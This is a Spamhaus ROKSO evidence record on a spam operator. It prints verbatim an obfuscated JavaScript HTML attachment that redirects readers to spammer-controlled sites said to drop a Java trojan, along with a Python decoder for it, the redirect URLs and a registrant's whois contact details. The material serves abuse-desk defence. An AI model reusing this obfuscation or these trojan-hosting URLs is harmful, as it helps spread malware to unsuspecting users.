ROKSO
The Register of Known Spam Operations
Sebastian Foss


Country: Germany
Lives in Germany, has used addresses in New York. He's involved in many Internet schemes and scams including e-mail and blog spamming, and MMF/MLM. He spams via proxies on dynamic IP addresses, has bulletproof hosting in China, and is involved in malware.



Attached HTML Files, Javascript Obfuscation, Trojan Download


As of January 2009, Sebastian Foss is sending spam with attached HTML files that contain JavaScript which redirects users to his web site. The final destination the script redirects to can be changed on the fly, presumably when one of Foss's servers or domains is blocklisted, or when a server is taken down for spam and abuse.

Here is a sample of the spam he sends with the attached HTML file:

Received: from yahoo.com ([124.236.241.66])
by <redacted> (8.14.1/8.12.11) with SMTP id <redacted>
for <redacted>; Sat, 10 Jan 2009 13:47:43 -0800 (PST)
Message-ID: <<redacted>@yahoo.com>
Date: Sun, 11 Jan 2009 <redacted> +0400
From: "eBay Cash Machine" <globalbox02wupkp@yahoo.com>
User-Agent: Opera/6.05 (Windows 2000; U) [ja]
X-Accept-Language: en-us
MIME-Version: 1.0
To: <redacted>
Subject: Quit Your Day Job Within 30 Days
Content-Type: multipart/mixed;
boundary="------------<redacted>"

<snip>

"How would you like an extra $250 - $1000 a week on eBay with 15 minutes of
your time ?"<br>

<snip>

<p><font face="Arial" size="3"><b>For Full Details please read the attached
html file</b><br>

<snip>

Here is the HTML file attached to this spam:

<!--hppage status="protected"-->
<!--HTML--><!--HEAD--><SCRIPT LANGUAGE="JavaScript"><!--
document.write(unescape("%3C%53%43%52%49%50%54%20%4C%41%4E%47%55%41%47%45%3D%22%4A%61%76%61%53%63%72%69%70%74%22%3E%3C%21%2D%2D%0D%0A%68%70%5F%6F%6B%3D%74%72%75%65%3B%66%75%6E%63%74%69%6F%6E%20%68%70%5F%64%30%31%28%73%29%7B%69%66%28%21%68%70%5F%6F%6B%29%72%65%74%75%72%6E%3B%76%61%72%20%6F%3D%22%22%2C%61%72%3D%6E%65%77%20%41%72%72%61%79%28%29%2C%6F%73%3D%22%22%2C%69%63%3D%30%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%7B%63%3D%73%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%3B%69%66%28%63%3C%31%32%38%29%63%3D%63%5E%32%3B%6F%73%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%63%29%3B%69%66%28%6F%73%2E%6C%65%6E%67%74%68%3E%38%30%29%7B%61%72%5B%69%63%2B%2B%5D%3D%6F%73%3B%6F%73%3D%22%22%7D%7D%6F%3D%61%72%2E%6A%6F%69%6E%28%22%22%29%2B%6F%73%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%6F%29%7D%2F%2F%2D%2D%3E%3C%2F%53%43%52%49%50%54%3E"));//--></SCRIPT><SCRIPT LANGUAGE="JavaScript"><!--
hp_d01(unescape(">#//JGCF//%3C>#//-JGCF//%3C"));//--></SCRIPT><!--/HEAD--><SCRIPT LANGUAGE="JavaScript"><!--
hp_d01(unescape(">dpcogqgv%3C>dpcog%22qpa? jvvr8--56,:3,:3,47-|angfm-a-acqj- %3C>-dpcogqgv%3C"));//--></SCRIPT><!--BODY--><NOSCRIPT>To view Full Details please click on the above bar and "Allow Blocked Content". Thank you!</NOSCRIPT><SCRIPT LANGUAGE="JavaScript"><!--
hp_d01(unescape(">#//@MF[//%3C>#//-@MF[//%3C"));//--></SCRIPT><!--/BODY--><!--/HTML-->
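The attachment above uses a two-stage obfuscation: the first script is plain percent-encoding that, once unescaped, defines hp_d01(), which XORs every ASCII character with 2; the later scripts feed short XOR-encoded strings through that function and document.write() the result. The decoder below is an added example written for this page (it is not Spamhaus's code nor the spammer's kit); the three hp_d01() arguments are copied verbatim from the attachment, and the function names js_unescape, hp_d01, decode_stage, decode_attachment and extract_frame_targets are mine.

```python
import re

# The three hp_d01() arguments copied verbatim from the attached HTML file above.
HP_PAYLOADS = [
    ">#//JGCF//%3C>#//-JGCF//%3C",
    ">dpcogqgv%3C>dpcog%22qpa? jvvr8--56,:3,:3,47-|angfm-a-acqj- %3C>-dpcogqgv%3C",
    ">#//@MF[//%3C>#//-@MF[//%3C",
]

_ESCAPE_RE = re.compile(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})")


def js_unescape(s: str) -> str:
    """Reproduce the legacy JavaScript unescape(): decode %XX and %uXXXX.
    Applied to the long percent-encoded string in the first <SCRIPT>, this
    yields the hp_d01() definition itself."""
    return _ESCAPE_RE.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), s)


def hp_d01(s: str) -> str:
    """Port of the decoded hp_d01(): XOR each code point below 128 with 2,
    leave the rest untouched. XOR with a constant is its own inverse, so the
    same routine encodes and decodes. Note that '<' (0x3C) and '>' (0x3E)
    swap, so the encoded text never contains a literal '<' for a naive
    attachment scanner to find."""
    return "".join(chr(ord(c) ^ 2) if ord(c) < 128 else c for c in s)


def decode_stage(payload: str) -> str:
    """One hp_d01(unescape(...)) call, as the browser would evaluate it."""
    return hp_d01(js_unescape(payload))


def decode_attachment(payloads) -> str:
    """Concatenate what every hp_d01() call would document.write()."""
    return "".join(decode_stage(p) for p in payloads)


_SRC_RE = re.compile(r"""<frame\b[^>]*\bsrc\s*=\s*["']([^"']+)["']""", re.I)


def extract_frame_targets(html: str) -> list:
    """Pull the <frame src=...> URLs out of the decoded markup: these are the
    redirect hops an abuse desk would log and block."""
    return _SRC_RE.findall(html)


if __name__ == "__main__":
    html = decode_attachment(HP_PAYLOADS)
    print(html)
    print(extract_frame_targets(html))
```

Running it shows that the attachment's real content is a single frameset pointing at a server under the spammer's control, which is the hop that can be re-pointed at whichever domain is not yet blocklisted.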



This HTML file, in one four-hour period, redirected to the following URLs:

http://www.advertise-bz.cn/cash/
http://www.promote-biz.com/cash/

There are inevitably going to be other URLs.

These URLs download a Java trojan onto the user's computer if the browser allows it.



--- reading URL http://www.promote-biz.com/cash/
--- contacting host www.promote-biz.com [61.164.113.124] on port 80

HTTP/1.1 200 OK
Content-Length: 558
Content-Type: text/html
Content-Location: http://www.promote-biz.com/cash/index.htm
Last-Modified: Thu, 08 Jan 2009 14:24:40 GMT
Accept-Ranges: bytes
ETag: "546ce3d79c71c91:264"
Server: Microsoft-IIS/6.0
Date: Mon, 12 Jan 2009 __:__:__ GMT
Connection: close

<html>

<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<meta name="GENERATOR" content="Microsoft FrontPage 4.0">
<meta name="ProgId" content="FrontPage.Editor.Document">
<title>eBay Cash Machine</title>
</head>
<script type="text/javascript">
if(top!= self) top.location.href = self.location.href
</script>
<frameset rows="40,*">
<frame src="http://61.164.113.124/x/bar/bar.htm">
<frame src="http://61.164.113.124/x/af/cash/">
<noframes>
<body>

</body>

</noframes>
</frameset>

</html>

--- connection closed




[whois.paycenter.com.cn]

Domain Name : promote-biz.com
PunnyCode : promote-biz.com

Registrant:
Organization : wang han
Name : wang han
Address : shi chuan
City : shichuan
Province/State : Sichuan
Country : CN
Postal Code : 64000

Administrative Contact:
Name : wang han
Organization : wang han
Address : shi chuan
City : shichuan
Province/State : Sichuan
Country : CN
Postal Code : 64000
Phone Number : 86-028-83267543
Fax : 86-028-83267543
Email : mico9520@sina.com.cn

Technical Contact:
Name : wang han
Organization : wang han
Address : shi chuan
City : shichuan
Province/State : Sichuan
Country : CN
Postal Code : 64000
Phone Number : 86-028-83267543
Fax : 86-028-83267543
Email : mico9520@sina.com.cn

Billing Contact:
Name : wang han
Organization : wang han
Address : shi chuan
City : shichuan
Province/State : Sichuan
Country : CN
Postal Code : 64000
Phone Number : 86-028-83267543
Fax : 86-028-83267543
Email : mico9520@sina.com.cn




The Register of Known Spam Operations (ROKSO) collates information and evidence on entities with a history of spamming or providing spam services, and entities affiliated or otherwise connected with them, for the purpose of assisting ISP Abuse Desks and Law Enforcement Agencies.
The address of this ROKSO record is: http://www.spamhaus.org/rokso/evidence/ROK8582/

The above consists of information in the public domain. The Spamhaus Project makes every effort to avoid errors in information in the ROKSO database, and will correct any errors as soon as it is able to verify the correction, but accepts no responsibility or liability for any errors or omissions, or liability for any loss or damage, consequential or otherwise, incurred in reliance on the material in these pages. The Spamhaus Project makes no warranties or representations as to the accuracy of the Information in ROKSO records. The information in the ROKSO database is for information purposes only and is not intended as legal advice of any kind.

For information on contacting the ROKSO Team regarding any factual errors in this record, see the ROKSO FAQs.
© 1998-2014 The Spamhaus Project Ltd. All rights reserved.